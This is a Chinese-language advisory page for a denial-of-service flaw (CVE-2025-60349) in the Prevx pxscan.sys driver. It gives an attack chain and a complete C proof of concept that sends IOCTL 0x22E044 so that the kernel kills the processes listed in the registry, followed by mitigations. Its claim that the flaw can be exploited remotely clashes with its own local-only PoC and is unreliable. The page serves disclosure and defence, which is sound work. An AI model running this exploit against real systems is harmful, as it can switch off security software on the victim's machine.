CVE-2025-60349 | Prevx pxscan.sys驱动程序IOCTL拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-60349

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Prevx v3.0.5.220

漏洞概述

CVE-2025-60349是一个影响Prevx安全软件v3.0.5.220版本的内核驱动程序拒绝服务漏洞。该漏洞存在于pxscan.sys驱动程序中，攻击者可以通过向该驱动程序发送特制的IOCTL（I/O Control Code）代码0x22E044来触发漏洞。当攻击者成功发送此IOCTL代码后，驱动程序会异常终止系统中注册在特定注册表键下的进程。具体来说，受影响的进程列表存储在注册表路径HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\pxscan\Files下，任何在此列表中注册的进程都将被强制终止。由于该漏洞位于内核驱动程序层面，攻击成功的后果将直接导致系统服务中断和关键进程异常终止，可能造成严重的系统不稳定和数据丢失。此漏洞的CVSS评分为7.5，属于高危级别，无需任何认证或用户交互即可远程利用，攻击复杂度低，具有极高的实际威胁性。攻击者可以利用此漏洞对部署了Prevx安全软件的终端进行拒绝服务攻击，导致防病毒保护失效，进而可能引发更严重的安全问题。

技术细节

该漏洞的核心在于Prevx的pxscan.sys内核驱动程序对IOCTL请求的处理存在缺陷。IOCTL（I/O Control Code）是应用程序与内核驱动程序通信的重要机制，通常用于发送特定的控制命令。攻击者构造并发送IOCTL代码0x22E044到pxscan.sys驱动程序后，驱动程序在处理该请求时未能正确验证输入参数或权限检查，导致异常行为发生。具体而言，当驱动程序接收到0x22E044这个特定的IOCTL代码时，其内部逻辑会读取注册表键HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\pxscan\Files中配置的文件列表，并尝试对这些进程执行终止操作。由于驱动程序运行在内核态，拥有较高的系统权限，因此可以成功终止几乎任何用户态进程。这种设计使得未经授权的IOCTL请求能够利用驱动程序的特权执行任意进程终止，属于典型的权限滥用漏洞。攻击者无需具备管理员权限即可发送这些IOCTL请求，这进一步加剧了漏洞的严重性。漏洞的利用过程简单直接，攻击者只需构造包含正确IOCTL代码的请求包即可触发，无需复杂的利用技术。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统上安装的Prevx安全软件，确认为v3.0.5.220版本

STEP 2

步骤2

攻击者构造包含IOCTL代码0x22E044的恶意请求包

STEP 3

步骤3

攻击者使用CreateFile打开pxscan.sys驱动的设备接口，获取设备句柄

STEP 4

步骤4

攻击者通过DeviceIoControl函数发送特制的IOCTL请求到驱动程序

STEP 5

步骤5

pxscan.sys驱动程序接收到IOCTL代码0x22E044后，读取注册表键HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\pxscan\Files中的进程列表

STEP 6

步骤6

驱动程序在内核态执行进程终止操作，导致列表中的进程被强制关闭

STEP 7

步骤7

目标系统出现拒绝服务症状，可能包括安全软件失效、系统服务中断等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-60349 PoC - IOCTL 0x22E044 DoS Exploit
// Target: Prevx pxscan.sys driver v3.0.5.220
// Description: Sends malicious IOCTL code to terminate processes listed in registry

#include <windows.h>
#include <stdio.h>

#define IOCTL_CODE 0x22E044
#define TARGET_DEVICE "\\\\.\\pxscan"

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    BOOL result;
    
    printf("[*] CVE-2025-60349 PoC - Prevx pxscan.sys DoS\n");
    printf("[*] IOCTL Code: 0x%X\n", IOCTL_CODE);
    
    // Open handle to pxscan.sys driver
    hDevice = CreateFileA(
        TARGET_DEVICE,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device handle. Error: %d\n", GetLastError());
        return 1;
    }
    
    printf("[+] Device handle opened successfully\n");
    
    // Send malicious IOCTL code to trigger DoS
    result = DeviceIoControl(
        hDevice,
        IOCTL_CODE,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    
    if (result) {
        printf("[+] IOCTL request sent successfully\n");
        printf("[+] Processes in registry list should be terminated\n");
    } else {
        printf("[-] IOCTL request failed. Error: %d\n", GetLastError());
    }
    
    CloseHandle(hDevice);
    return 0;
}

影响范围

Prevx v3.0.5.220

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）禁用或卸载Prevx安全软件；2）使用组策略限制对pxscan.sys驱动程序的访问；3）部署应用程序控制策略阻止未知程序与驱动程序交互；4）启用Windows内核驱动程序签名强制策略；5）监控安全日志中的异常IOCTL活动；6）考虑使用替代的安全软件解决方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60349
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60349
3 Details https://www.cvedetails.com/cve/CVE-2025-60349/
4 VulDB https://vuldb.com/cve/CVE-2025-60349
5 Link http://prevx.com
6 Link https://github.com/djackreuter/CVE-2025-60349